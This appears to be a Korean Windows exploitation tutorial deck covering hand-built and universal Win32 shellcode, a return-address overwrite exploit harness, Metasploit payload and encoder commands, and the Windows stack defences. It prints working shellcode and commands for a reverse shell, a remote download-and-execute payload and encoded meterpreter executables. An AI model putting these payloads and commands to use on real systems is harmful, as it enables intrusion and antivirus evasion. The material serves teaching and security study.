Windows System Hacking Technique

Windows System Hacking

Technique

Author : 조현석(evernick): 김언체(ruina)

E-Mail : [email protected]: [email protected]

Blog : http://ruinick.tistory.comCommunity : http://cafe.naver.com/rekcahCompany : http://www.rekcah.co.kr

Table Of Contents 1/7

0. Introduction0-1. Introduction

1. Software Vulnerabilty Review1-1. Buffer OverFlow

1-2. Format String Bug

2. Classic Technique Review2-1. Writing RET Based Buffer OverFlow Exploits

2-1-1. Direct-RET2-1-2. Trampoline2-1-3. Real Application Attack(A-PDF All to MP3)

0-1. Testing Environment

1-3. Integer OverFlow


3. Win32 ShellCode3-1. Making Win32 ShellCode

3-3. Making Universal ShellCode

3-4. Using Metasploit Payload and Encoder

3-2. Win32 ShellCode Unicode Problem

4. About Defence Technique4-1. GS(Stack Guard)

4-2. SafeSEH(SEH Handler Validation Check)4-3. DEP(Data Execution Prevension)4-4. ASLR(Address Space Layout Randomization)4-5. SEHOP(Structured Error Handling Overwrite Protection)


5. SEH(Structured Error Handling)5-1. SEH(Structured Error Handling)?

5-2. Debugging SEH Chain5-2-1. Using OllyDbg5-2-2. Using WinDbg

5-3. Debugging Stack View On The SEH Chain5-3-1. Build Visual Studio 6.0(SEH3)5-3-2. Build Visual Studio 2005(SEH4)

6. Writing SEH Based Buffer OverFlow Exploits6-1. SEH Handler OverWrite

6-2. Real Application Attack(MP3 Cd Converter)

6-1-2. Check SafeSEH6-1-1. Debugging GS Option Enable

6-1-3. Writing Exploit


7-1. Application Test by DEP Policy Enable

7. RTL(Return To Library)

7-2. RTL(Return To Library)7-3. Chining RTL7-4. Problem Of RTL?


8-1. ROP(Return Oriented Programming)?8-2. Gadjet8-3. Weapon

8-4. Flowing Going To ROP8-4-1. RET Based8-4-2. SEH Based

8-5. ROP Based Exploit Composition8-5-1. StackPivot8-5-2. ROP Chain(General-purpose Registers or Stack?)

8-6. Training ROP Based Exploit by POC Code

8. ROP(Return Oriented Programming)

8-7. Universal ROP Exploit8-8. Using mona.py Plug-in

8-9. RET Based ROP – BlazeDVD – DEP(OptOut)8-10. SEH Based ROP – WireShark – DEP(AlwaysOn)

8-3-1. API Chain8-3-2. Function Parameter8-3-3. Weapon Test by DEP Policy(OptOut, AlwaysOn)


9. Heap9-1. About Heap9-2. Debugging Heap

10. Heap Spray Part1 – Basic Scripting10-1. Heap Spray10-2. Debugging String Allocation by JavaScript

10-2-2. String Allocation by Unescape()10-3. Heap Spray Memory Layout

10-3-1. Desired Heap Spray Memory Layout10-3-2. Heap Spray Script by Exploit-DB(IE6)

10-5. Exploit Heap Spray – RSP MP3 Player(OCX ActiveX BOF)

10-6. Non-Browser Heap Spray10-6-1. Adobe PDF Reader – JavaScript10-6-2. Adobe Flash Player – Action Script10-6-3. MS Office – VBA

10-2-1. Basic String Allocation

10-3-3. Heap Spray Script by Exploit-DB(IE7)10-4. Reliability Pointer Verification by Heap Spray Code(IE6 and IE7)

11-1. Internet Explorer 8 Problem

11-2. ByPass DEP by Heap Spray Composition

11. Heap Spray Part2 : ROP Heap Spray


11-2-1. ROP Heap Spray Memory Layout

11-2-2. Flowing Going To ROP Chain

12-1. ASLR(Address Space Layout Randomization)

12-1-1. Debugging ASLR

12. ByPass Defence Technique of Windows 7

12-1-2. ByPass ASLR with DEP - BlazeDVD

12-2. SEHOP(Structured Error Handling Overwrite Protection)

12-2-1. Debugging SEHOP Enable

12-2-2. Execution Condition by _except_handler3()

12-2-3. ByPass SEHOP – AudioTran – SEH Scope Table Overwrite

11-3. Converting Exploit Code – RSP3 MP3 Player

11-4. [ETC] Corean Team FF/IE8/IE9/IE10 Heap Spray Script

Introduction

0-1. Introduction

u 서론§ 본문서는윈도우즈환경의기본적인버퍼오버플로우취약점부터현재까지널리알려진다양한취약점을예제와프로그램을통해서지식을공유하기위한목적으로작성하였습니다.문서는 Stack을공격하기위한기법에대한내용으로총 6개로작성되었습니다.

§ 문제가되는부분이있는경우메일을통해연락주시면감사하겠습니다.


u Windows XP§ OS : Windows XP Professional K Service Pack 3§ Compiler 1 : Microsoft Visual Studio 6.0§ Compiler 2 : Microsoft Visual Studio 2005

u Windows 7§ OS : Windows 7 SP1 Ultimate K 32bit§ Compiler : Microsoft Visual Studio 2010

u Kali Linux§ OS : Kali Linux 1.0.7 32bit


u Microsoft Visual Studio§ Microsoft Visual Studio 6.0§ Microsoft Visual Studio 2005§ Microsoft Visual Studio 2010

u Script Language§ PyThon 2.7, JavaScript, VB Script, Action Script

u Debugger§ OllyDbg, WinDbg, Immunity Debugger, IDA

u Tools§ PE View, Depency Walker, Cygwin, IE Collection

Win32 ShellCode

3-1. Making Win32 ShellCode

u 쉘코드를만들기위한방법§ Visual Studio의 Debugging 모드를활용§ 어셈블리어또는인라인어셈블리어로직접작성


Ø 쉘코드로만들코드와실행결과


Ø 소스코드에 BreakPoint(F9) 설정 ->디버깅시작(F5) ->우클릭후디스어셈블리로이동


Ø C 소스코드를포함한불필요한부분을제외하고어셈블리코드만추출


push ebp // Function Prologuemov ebp, espsub esp, 8 // Local Varible Area

mov byte ptr [ebp-8], 63h // “calc”mov byte ptr [ebp-7], 61hmov byte ptr [ebp-6], 6Chmov byte ptr [ebp-5], 63hmov byte ptr [ebp-4], 0

push 5 // Arg2 : SW_SHOWlea eax, [ebp-8]push eax // Arg1 : “calc” Addresscall dword ptr ds:[00402004h] // WinExec()

push 0 // Arg1 : 0call dword ptr ds:[00402000h] // ExitProcess()


Ø kenel32.dll의WinExec함수의주소0x7C800000(Image Base) + 0x000623AD(RVA) = 0x7C8623AD


Ø kenel32.dll의 ExitProcess함수의주소0x7C800000(Image Base) + 0x0001CAFA(RVA) = 0x7C81CAFA

3-1. Making Win32 ShellCodepush ebp // Function Prologuemov ebp, espsub esp, 8 // Local Varible Area


push 5 // Arg2 : SW_SHOWlea eax, [ebp-8]push eax // Arg1 : “calc” Addresscall dword ptr ds:[00402004h] // WinExec()mov eax, 0x7c8623adcall eax

push 0 // Arg1 : 0call dword ptr ds:[00402000h] // ExitProcess()mov eax, 0x7c81cafacall eax


push ebp // Function Prologuemov ebp, espsub esp, 8 // Local Varible Area



push 0 // Arg1 : 0call dword ptr ds:[00402000h] // ExitProcess()mov eax, 0x7c81cafacall eax


3-1. Making Win32 ShellCodepush ebp // Function Prologuemov ebp, espsub esp, 8 // Local Varible Area

xor eax, eax // Zero Initilizingxor ecx, ecxmov cl, 2lea edi, [esp]rep stos dword ptr [edi]



push 0 // Arg1 : 0xor eax, eaxpush eaxcall dword ptr ds:[00402000h] // ExitProcess()mov eax, 0x7c81cafacall eax



Ø 디버깅 -> 디스어셈블리이동 -> 코드바이트표시후기계어코드만추출

3-1. Making Win32 ShellCodepush ebpmov ebp, espsub esp, 8

xor eax, eaxxor ecx, ecxmov cl, 2lea edi, [esp]rep stos dword ptr [edi]

mov byte ptr [ebp-8], 63hmov byte ptr [ebp-7], 61hmov byte ptr [ebp-6], 6Chmov byte ptr [ebp-5], 63h

push 5lea eax, [ebp-8]push eax

mov eax, 0x7c8623adcall eax

xor eax, eaxpush eax

mov eax, 0x7c81cafacall eax

\x55\x8B\xEC\x83\xEC\x08

\x33\xC0\x33\xC9\xB1\x02\x8D\x3C\x24\xF3\xAB

\xC6\x45\xF8\x63\xC6\x45\xF9\x61\xC6\x45\xFA\x6C\xC6\x45\xFB\x63

\x6A\x05\x8D\x45\xF8\x50

\xB8\xAD\x23\x86\x7C\xFF\xD0

\x33\xC0\x50

\xB8\xFA\xCA\x81\x7C\xFF\xD0


#include <windows.h>

char shellcode[] = [작성한쉘코드입력지점]

int main(int argc, char **argv){

int *code;code = (int *)shellcode;__asm{

jmp code;}return 0;

}

Ø 쉘코드가제대로동작하는지테스트하기위한코드



u Unicode Problem§ 데이터(여기서는쉘코드)가내부적으로사용될때대문자에서소문자로변할수도, 아스키코드와유니코드간에변환이일어나기도함

§ 아스키로입력된데이터 0x61(‘a’)은유니코드 0x0061로변환되며공격코드를사용할수없게됨

§ 아스키로입력된데이터가유니코드로변환될때유니코드로표현할수없는문자는0x003F로대체

u Unicode와호환가능한쉘코드§ ASCII와같은역할을하는코드를찾아그곳으로점프§ 새로운유니코드호환쉘코드를작성§ 디코더를이용

Ø cp949 Unicode Table http://Unicode.org/Public/MAPPINGS/VENDORS/MICSFT/WINDOWS/CP949.TXT

3-2. Win32 ShellCode Unicode Problem#include <stdio.h>#include <process.h>#include <windows.h>

char shellcode[] = "\x55" // push ebp"\x8B\xEC" // mov ebp, esp"\x83\xEC\x08" // sub esp, 8"\x33\xC0" // xoreax, eax"\x33\xC9" // xorecx, ecx"\xB1\x02" // mov cl, 2"\x8D\x3C\x24" // lea edi, [esp]"\xF3\xAB" // rep stos dword ptr [edi]"\xC6\x45\xF8\x63" // byte ptr [ebp-8], 63h"\xC6\x45\xF9\x61" // byte ptr [ebp-7], 61h"\xC6\x45\xFA\x6C" // byte ptr [ebp-6], 6Ch"\xC6\x45\xFB\x63" // byte ptr [ebp-5], 63h"\x6A\x05" // push 5"\x8D\x45\xF8" // lea eax, [ebp-8]"\x50" // push eax"\xB8\xAD\x23\x86\x7C“ // mov eax, 0x7c8623ad"\xFF\xD0" // calleax"\x33\xC0" // xoreax, eax"\x50" // push eax"\xB8\xFA\xCA\x81\x7C“ // mov eax, 0x7c81cafa"\xFF\xD0" // call eax;

Ø 3.1에서작성한쉘코드


#include <stdio.h>#include <windows.h>

int main(int argc, char **argv){

char buffer[120];

int ebp = atoi(argv[1]);

memset(buffer, 0x90, sizeof(buffer);memcpy(buffer+30, shellcode, strlen(shellcode);

*(long *)&buffer[ebp] = 0x41414141; // SFP 4 Byte OverWrite With Debugging*(long *)&buffer[ebp+4] = 0x0013FF14; // Return Address OverWrite For ShellCode

execl(“bof_vulne.exe”, “bof_vulne.exe”, buffer, 0); // Exploit bof_vuln.exereturn 0;

}

Ø cmd의인자로쉘코드를주입하는형태의 Exploit

3-2. Win32 ShellCode Unicode Problem\x55\x8B\xEC\x83\xEC\x08\x33\xC0\x33 // 0x3F\xC9\xB1\x02\x8D\x3C // 0x3F\x24\xF3\xAB\xC6\x45\xF8\x63 // 0x3F\xC6\x45\xF9\x61 // 0x3F\xC6\x45\xFA\x6C // 0x3F\xC6\x45\xFB\x63 // 0x3F\x6A\x05\x8D\x45\xF8\x50 // 0x3F\xB8\xAD\x23\x86\x7C // 0x3F\xFF\xD0\x33 // 0x3F\xC0\x50\xB8\xFA\xCA\x81 // 0x3F\x7C\xFF\xD0 // 0x3F

Ø Unicode 문제에의해 3F로대체된값확인


Ø cmd의인자로입력될시 0x3F로변하지않게쉘코드다시작성


char shellcode[] = "\x33\xc0" // xor eax, eax"\x50" // push eax"\x68\x63\x61\x6C\x63" // push 0x636c6163"\x8B\xC4" // mov eax, esp"\x6A\x05" // push 5"\x50" // push eax"\x68\xFA\xCA\x71\x7C" // push 0x7c71cafa"\x80\x44\x24\x02\x10" // add byte ptr [esp+2], 10h"\x68\x7D\x23\x76\x7C" // push 0x7c76237d"\x80\x04\x24\x30" // add byte ptr [esp], 30h"\x80\x44\x24\x02\x10" // add byte ptr [esp+2], 10h"\xC3" // retn;


Ø 쉘코드테스트


Ø cmd의인자로넘길경우에도 0x3F로변경되지않게됨


u Universal ShellCode§ 앞에서작성한기본쉘코드는그환경과동일한환경에서만동작§ 시스템마다 DLL의버전이다르고(XP SP2, XP SP3, Win 7, ...), 그안에실제함수의주소도버전에따라달라지므로결과적으로같은 DLL 버전을사용하지않는환경에서는쉘코드가제대로동작하지않는상황이발생

u Universal ShellCode를제작하는방법§ kernel32.dll의 LoadLibrary(), GetProcAddress() API를동적으로구할수만있으면다른 DLL을로드하고해당 DLL의함수의주소를동적으로구할수있게됨

§ kernel32.dll에서함수의주소를동적으로구하기위한방법- PEB(Process Environment Block)의 LDR을이용하는방법- TOP SEH를이용하는방법


Ø LDR 구조체로로드된모듈의정보를찾는과정


Ø kernel32.dll에서함수의주소를찾는과정


Ø SEH Chain


Ø SEH3 Layout


Ø PEB를이용하여 Universal ShellCode 작성

#include <windows.h>

__declspec(naked)void main(){

__asm{

// [esp]~[esp+0x2f ] : NamePointer // [esp+0x30]~[esp+0x5f ] : AddressPointer // [esp+0x60]~[esp+0x9f ] : String Data// [esp+0x100] : Function Count// [esp+0x104] : Number of Functionsub esp, 0x108;

mov ecx, 0x41;mov eax, 0;lea edi, dword ptr [esp];rep stosd;

mov dword ptr [esp+0x104], 1; // Number of Function



// "kernel32.dll"mov dword ptr [esp+0x60], 0x6e72656b;mov dword ptr [esp+0x64], 0x32336c65;mov dword ptr [esp+0x68], 0x6c6c642e;

// WinExecmov dword ptr [esp+0x70], 0x456e6957;mov dword ptr [esp+0x74], 0x636578;

// calc.exemov dword ptr [esp+0x78], 0x636c6163;mov dword ptr [esp+0x7c], 0x6578652e;

// ExitProcessmov dword ptr [esp+0x84], 0x74697845;mov dword ptr [esp+0x88], 0x636f7250;mov dword ptr [esp+0x8c], 0x737365;

// Function Name Arrarylea eax, dword ptr [esp+0x70];mov dword ptr [esp], eax;lea eax, dword ptr [esp+0x84];mov dword ptr [esp+4], eax;



START:// PEB를통해kernel32.dll의주소를구함mov edx, dword ptr fs:[0x30]; // _TEB._PEBmov edx, dword ptr [edx+0xc]; // _PEB._LDR_DATA_TABLEmov edx, dword ptr [edx+0x14]; // _LDR_DATA_TABLE.InMemoryModuleList

MODULE_GETNAME:mov esi, dword ptr [edx+0x28]; // _LDR_DATA_TABLE_ENTRYlea edi, dword ptr [esp+0x60]; // "kernel32.dll"

MODULE_LOOP1:mov al, byte ptr [esi];mov bl, byte ptr [edi];cmp al, 0;jne MODULE_LOOP2;cmp bl, 0;jne MODULE_LOOP2;jmp MODULE_FINISH;



MODULE_LOOP2:add esi, 2;add edi, 1;cmp al, bl;je MODULE_LOOP1;jmp MODULE_LDR_NEXT;

MODULE_LDR_NEXT:mov edx, dword ptr [edx];jmp MODULE_GETNAME;

MODULE_FINISH:// kernel32.dll을통해특정함수의주소를구함mov ebp, dword ptr [edx+0x10]; // Get Module(kernel32.dll) Image Basemov edx, dword ptr [ebp+0x3c]; // IMAGE_NT_HEADER_OFFSET 값// mov eax, dword ptr [ebp+edx+0x78]; // EXPORT_TABLE RVA 값// mov ebx, dword ptr [ebp+edx+0x7c]; // EXPORT_TABLE SIZE 값mov edx, dword ptr [ebp+edx+0x78]; // EXPORT_TABLE RVA 값add edx, ebp; // EXPORT_TABLE VAmov ecx, dword ptr [edx+0x18]; // EDT.Export NumberOf Function(함수의개수)mov ebx, dword ptr [edx+0x20]; // EDT.Export Name Pointer Tableadd ebx, ebp; // ENT(Export Name Pointer Table) Address



FUNC_GETNAME:dec ecx;mov esi, dword ptr [ebx+ecx*4]; // Function Name Pointer RVAadd esi, ebp; // Function Name Pointer VAmov edi, dword ptr [esp+0x100];mov edi, dword ptr [esp+edi*4]; // Function Array {WinExec, ExitProcess}

FUNC_LOOP1:mov al, byte ptr [esi];mov ah, byte ptr [edi];cmp al, 0;jne FUNC_LOOP2;cmp ah, 0;jne FUNC_LOOP2;jmp FUNC_FINISH;

FUNC_LOOP2:inc esi;inc edi;cmp al, ah;je FUNC_LOOP1;jmp FUNC_GETNAME;



UNC_FINISH:mov ebx, dword ptr [edx+0x24]; // Ordinal Table RVAadd ebx, ebp; // Ordinal Table VAmov cx, word ptr [ebx+ecx*2]; // name_index -> odrdinal 값확인

mov ebx, dword ptr [edx+0x1c]; // Export Address Table RVAadd ebx, ebp; // Export Address Table VAmov eax, dword ptr [ebx+ecx*4]; // Export Address Table[Ordinal*4]로함수 RVA 확인add eax, ebp; // WinExec 함수VA

COPY_FUNCADDR:mov ecx, dword ptr [esp+0x100];mov dword ptr [esp+ecx*4+0x30], eax;

CHECK_FUNC:mov ecx, dword ptr [esp+0x100];mov edx, dword ptr [esp+0x104];cmp ecx, edx;je FUNC_CALL;inc ecx;mov dword ptr [esp+0x100], ecx;jmp START;



FUNC_CALL:// WinExec Function CALLpush 5; // SW_SHOWlea ebx, dword ptr [esp+0x7c]; // "calc.exe"push ebx;lea eax, dword ptr [esp+0x38];mov eax, dword ptr [eax];call eax;

// ExitProcess Function ALLpush 1;lea eax, dword ptr [esp+0x34];mov eax, dword ptr [eax+0x4];call eax;

}}


Ø Windows XP Service Pack 3에서동작확인


Ø Windows 7 Service Pack 1에서동작확인


u msfpayload 메인명령§ msfpayload –h // Help Banner§ msfpayload –l // List Available Payloads

u msfpayload 모듈§ windows/exec // windows 명령어실행§ windows/shell_bind_tcp // TCP Bind Shell§ windows/shell_reverse_tcp // TCP Reverse Shell§ windows/download_exec // HTTP(S)/FTP 파일다운로드및실행§ windows/meterpreter/reverse_tcp // reverse_tcp 미터프리터§ windows/x64/exec // Windows x64 환경명령어실행§ ...........


u msfpayload 명령예시(Kali Linux 기준)§ msfpayload windows/exec S

- 페이로드에적용가능한옵션출력

§ msfpayload windows/exec CMD=calc.exe C- calc.exe를실행시키는페이로드를생성하여 C 포맷의쉘코드로출력

§ msfpayload windows/exec CMD=notepad.exe X > payload.exe- notepad.exe를실행시키는페이로드를생성하여윈도우실행파일

(payload.exe)로저장

§ msfpayload windows/exec CMD=notepad.exe R > payload.raw- 위와동일하나로우데이터포맷으로저장하며, 추후 MSFencode에서사용

§ msfpayload windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=9000 N- 192.168.0.1에 9000 포트를연결시킬 shell_reverse_tcp 페이로드를생성하여

PyThon 포맷의쉘코드로출력

3-4. Using Metasploit Payload and Encoderroot@kali:~# msfpayload windows/exec CMD=calc.exe C/** windows/exec - 200 bytes* http://www.metasploit.com* VERBOSE=false, PrependMigrate=false, EXITFUNC=process, * CMD=calc.exe*/

unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30""\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff""\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2""\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85""\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3""\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d""\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58""\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b""\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff""\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00""\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56""\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75""\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63""\x2e\x65\x78\x65\x00";root@kali:~#

Ø calc.exe명령어실행페이로드를 C 포맷의쉘코드로출력한결과


Ø 페이로드로생성한쉘코드실행결과


u msfencode 메인명령§ msfencode –h // Help Banner§ msfencode –l // List Available Encoders§ msfencode –e [opt] // The Encoder Use§ msfencode –b [opt] // 제외할문자설정(ex: ‘\x00\xff’)§ msfencode –t [opt] // 출력할포맷지정

// (c, elf, exe, java, js_le, js_be, perl, raw, ruby, ...)§ ...

u msfencode 모듈§ x86/shikata_ga_nai // Polymorphic XOR Addtive Feeback Encoder§ x86/countdown // Single-byte XOR Countdown Encoder§ x86/alpha_mixed // Alpha2 Alphanumeric Mixedcase Encoder§ x86/alpha_upper // Alpha2 Alphanumeric Uppercase Encoder§ x86/unicode_mixed // Alpha2 Alphanumeric Unicode Mixedcase Encoder§ x86/unicode_upper // Alpha2 Alphanumeric Unicode Uppercase Encoder


u msfencode 명령예시(Kali Linux 기준)§ msfencode –I payload.raw –o encoded_payload.exe –e x86/shikata_ga_nai –c 5 –t exe

- payload.raw를 shikata_ga_nai로 5회인코딩후파일명을 encoded_payload.exe로저장

§ msfpayload windows/exec CMD=calc.exe R | msfencode –b ‘\x00\xff’ –e x86/shikata_ga_nai –t c- 페이로드로생성된로우데이터를 ‘\x00‘ ‘\xff’ 문자를제외하게끔 x86/shikata_ga_nai로인코딩하고 C 포맷의쉘코드로출력

§ msfpayload windows/download_exec_https EXE=payload.exe URL=http://rekcah.co.kr/calc.exe | msfencode –e x86/shikata_ga_nai –t raw | msfencode –e x86/alpha_mixed –t c

- 다중인코딩페이로드생성후 C 포맷의쉘코드로출력

§ msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode –e x86/countdown –c 5 -t raw | msfencode –e x86/shikata_ga_nai –c 5 –t exe –o multi-encoded_payload.exe

- 다중인코딩페이로드생성후윈도우실행파일(multi-encoded_payload.exe)로저장

§ msfencode –I payload.raw BufferRegister=ESI –e x86/alpha_mixed –t c- ESI 레지스터가쉘코드를가리키는문자숫자조합형쉘코드를생성하여 C 포맷출력

3-4. Using Metasploit Payload and Encoderroot@kali:~# msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -t raw | msfencode -e x86/alpha_mixed -t c[*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)

[*] x86/alpha_mixed succeeded with size 516 (iteration=1)

unsigned char buf[] = "\x89\xe1\xdb\xc6\xd9\x71\xf4\x5d\x55\x59\x49\x49\x49\x49\x49""\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a""\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32""\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49""\x68\x5a\x58\x4f\x6d\x6a\x6e\x4f\x30\x6f\x52\x6f\x69\x31\x68""\x59\x31\x64\x71\x34\x68\x74\x32\x78\x44\x73\x4a\x69\x68\x31""\x57\x43\x30\x31\x42\x70\x56\x77\x6d\x53\x4b\x58\x4b\x4c\x67""\x73\x69\x6f\x43\x4c\x6c\x6d\x53\x64\x37\x73\x52\x4a\x4e\x58""\x6a\x37\x79\x6b\x50\x6b\x39\x4b\x35\x4e\x77\x6e\x32\x7a\x39""\x59\x53\x75\x52\x4b\x5a\x6f\x4b\x6d\x64\x4e\x46\x59\x6b\x4c""\x4d\x46\x73\x73\x6c\x69\x34\x37\x79\x4a\x70\x4b\x69\x4e\x44""\x70\x32\x71\x6e\x4a\x4b\x61\x6a\x61\x42\x77\x72\x52\x6d\x6d""\x54\x42\x48\x79\x64\x4e\x4f\x4f\x66\x36\x68\x59\x44\x6f\x34""\x30\x4c\x6b\x57\x68\x33\x47\x42\x4c\x32\x64\x70\x48\x31\x30""\x69\x6b\x6a\x57\x71\x6d\x33\x75\x58\x39\x4a\x6b\x43\x4c\x6c""\x49\x4c\x76\x34\x34\x75\x57\x6c\x6c\x55\x58\x45\x50\x4d\x6d"

Ø 다중인코딩페이로드출력결과


"\x6c\x6f\x73\x68\x68\x39\x68\x4a\x4b\x48\x73\x70\x78\x31\x6e""\x75\x68\x58\x72\x51\x45\x46\x39\x56\x35\x75\x56\x58\x36\x73""\x37\x4d\x4b\x6d\x6d\x6b\x4a\x55\x54\x4f\x77\x6e\x6d\x5a\x57""\x49\x48\x43\x45\x71\x36\x43\x48\x34\x67\x6d\x53\x55\x4e\x63""\x74\x67\x62\x48\x4d\x4d\x48\x70\x7a\x7a\x50\x6b\x63\x56\x6c""\x4b\x53\x30\x6b\x49\x63\x4b\x66\x4b\x6b\x72\x31\x49\x50\x58""\x4a\x6a\x34\x47\x55\x6f\x74\x6b\x4f\x30\x5a\x4c\x52\x6b\x63""\x43\x5a\x64\x6b\x43\x7a\x38\x64\x4f\x5a\x50\x43\x48\x55\x4f""\x39\x50\x52\x51\x56\x5a\x37\x74\x48\x44\x79\x4a\x6d\x48\x31""\x35\x33\x6d\x6f\x76\x70\x4f\x50\x59\x6f\x4d\x42\x4e\x64\x6f""\x39\x6f\x6d\x65\x6d\x4c\x57\x54\x42\x59\x5a\x34\x39\x5a\x6f""\x4b\x54\x4b\x4c\x62\x78\x33\x4d\x6c\x55\x43\x6e\x4d\x6f\x63""\x69\x44\x71\x32\x56\x46\x61\x6c\x79\x32\x4c\x7a\x78\x6d\x77""\x49\x43\x6c\x6a\x51\x6c\x6c\x50\x6b\x78\x75\x31\x4c\x34\x65""\x34\x6e\x5a\x38\x53\x6e\x5a\x33\x52\x4c\x6c\x65\x4b\x6c\x62""\x36\x56\x6c\x66\x32\x59\x6c\x36\x32\x37\x79\x37\x6e\x6e\x5a""\x4c\x4f\x63\x53\x46\x6f\x76\x4f\x6e\x50\x38\x50\x36\x50\x52""\x5a\x4e\x33\x38\x37\x49\x32\x59\x76\x75\x6a\x73\x62\x77\x33""\x4c\x4c\x73\x72\x41\x41";root@kali:~#

Ø 다중인코딩페이로드출력결과


Ø 페이로드로생성한쉘코드실행결과

AboutDefence Technique

4-1. GS(Stack Guard)

u Security Cookie§ Windows상의 Stack Protection§ Visual Studio 7.0(2003) 버전이후 Default Option으로적용§ Stack에할당된 Buffer 영역과 SFP(Saved Frame Pointer) 영역사이에랜덤한쿠키를추가하고, 이후체크루틴에의해값의변조유무를판단하여버퍼오버플로우를감지(쿠키관련추가코드생성)


Ø Visual Studio의컴파일속성에서 GS 옵션설정


void vulnerable(const char *str) // Vulnerable function{

buffer[10];strcpy(buffer, str); // Buffer OverRun!!

}

cookie = rand();

void vulnerable(const char *str) // Vulnerable function{

int security_cookie = cookie;buffer[10];strcpy(buffer, str); // Buffer OverRun!!if ( security_cookie != cookie )

TerminateProcess(GetCurrentProcess());}

Ø GS Option Disabled

Ø GS Option Enabled


Ø GS 옵션미적용 Stack Frame Ø GS 옵션적용 Stack Frame

Return Address(RET)

Saved Frame Pointer(SFP)

Buffer(Local Variable Area)

Return Address(RET)

Saved Frame Pointer(SFP)

Buffer(Local Variable Area)

Security Cookie


#include <stdio.h>#include <string.h>

int main(int artc, char **argv){

char buffer[10];strcpy(buffer, artv[1]);return 0;

}

Ø GS Option으로컴파일될경우의코드확인을위한예제


4-2. SafeSEH(SEH Handler Validation Check)

u SEH Handler Validation Check§ SEH 기반 Exploit을보호하기위한메커니즘§ Visual Studio 7(2003) 버전이후 Default 옵션으로적용(/SAFESEH)§ EXCEPTION_REGISTRATION_RECORD의예외처리핸들러가조작되어있을경우핸들러를호출하지않음

§ 컴파일시링커에의해안전한예외처리목록을생성하며, 후에예외처리핸들러가덮어씌여질경우예외를탐지하여프로그램을종료


Ø Visual Studio의링커속성에서 SAFESEH 옵션설정


Ø OllyDbg의 SafeSEH Moduler Scanner Plugin(Immunity Debugger의 mona플러그인으로도확인가능)

4-3. DEP(Data Execution Prevention)

u DEP 개요§ 공격자에의해 Stack, Heap, Data Section에서의코드실행을금지§ 보통버퍼오버플로우를이용한기존의 Exploit은악의적인코드(쉘코드)가 Stack에존재하고 exploit 시 Stack에있는쉘코드가실행되는형태였지만, DEP 적용시 Stack은실행권한이없는영역이므로공격(코드실행)을수행할수없게됨

u DEP 모드§ 하드웨어(H/W) DEP

- CPU의 NX(AMD)나 XD(Intel) bit를이용- 현재 DEP는대부분하드웨어 DEP를의미한다볼수있음- 데이터영역에 Non-eXecutable을표시해두고해당영역에코드실행시도가있을경우 Access Violation 발생

§ 소프트웨어(S/W) DEP- 하드웨어의지원이없더라도소프트웨어적으로구현할수있도록 Windows에서지원하는형태

- SafeSEH와같은기법을의미


u DEP 4가지정책수준

정책수준

OptIn 제한된모듈이나바이너리만이 DEP에의해보호Windows XP의기본설정

OptOut 예외리스트내의프로세스들을제외한모든프로세스들은DEP에의해보호

AlwaysOn 예외없이모든프로세스들은 DEP에의해보호

AlwaysOff DEP 기능을중지

u Permanent DEP§ Windows XP SP3부터추가§ SetProcessDEPPolicy(PROCESS_DEP_ENABLE) API를이용하여프로세스의 DEP를활성화시킬수있음

§ /NXCOMPAT 옵션을사용하여링크한모든실행모듈들은자동적으로 “Permanent” 플래그가설정

§ https://msdn.microsoft.com/en-us/library/bb736299(v=VS.85).aspx

4-3. DEP(Data Execution Prevention)u DEP 정책변경(내컴퓨터속성 -> 고급시스템설정 -> 성능설정 -> DEP)

4-3. DEP(Data Execution Prevention)u DEP 정책상세변경

§ Windows XP Or Windows Server 2003에서 DEP 정책변경- boot.ini에서 OS 부팅설정라인끝에다음인자를통해변경- /noexecute=[정책수준]

§ Windows Vista, Windows 7, Windows Server 2008에서 DEP 정책변경- bcdedit /set nx [정책수준]


Ø Visual Studio의링커속성에서 DEP 옵션설정


u ASLR§ 프로세스내의다양한오브젝트에대하여실행시주소를랜덤화§ 실행파일 Image, Library, Stack, Heap, TEB, PEB, ...§ Windows Vista sp0부터적용§ 공격자는오브젝트에대한정확한주소를예측할수없으므로공격에실패하게됨


Ø Visual Studio의링커속성에서 ASLR 옵션설정


#include <stdio.h>

int main(){

char buffer[1024];printf(“Buffer Address : %p\n”, buffer);return 0;

}

Ø Stack에할당되는지역변수의주소를확인하는코드


Ø ASLR 옵션미적용 Ø ASLR 옵션적용


u SEH Chain Validation Check§ Exception Handler 들을호출하기전에, Exception Record Chain을점검하는기능§ Windows Vista SP1, Windows 7, Windows Server2008, Windows Server 2008 R2에서 SEHOP에대한지원이포함

§ 기본적으로 SEHOP는 Windows Server 2008 R2 및 Windows Server 2008에서Default로사용되고Windows 7 및 Windows Vista에서는 Default로사용되지않음

Ø MSDN : http://support.microsoft.com/kb/956607/ko


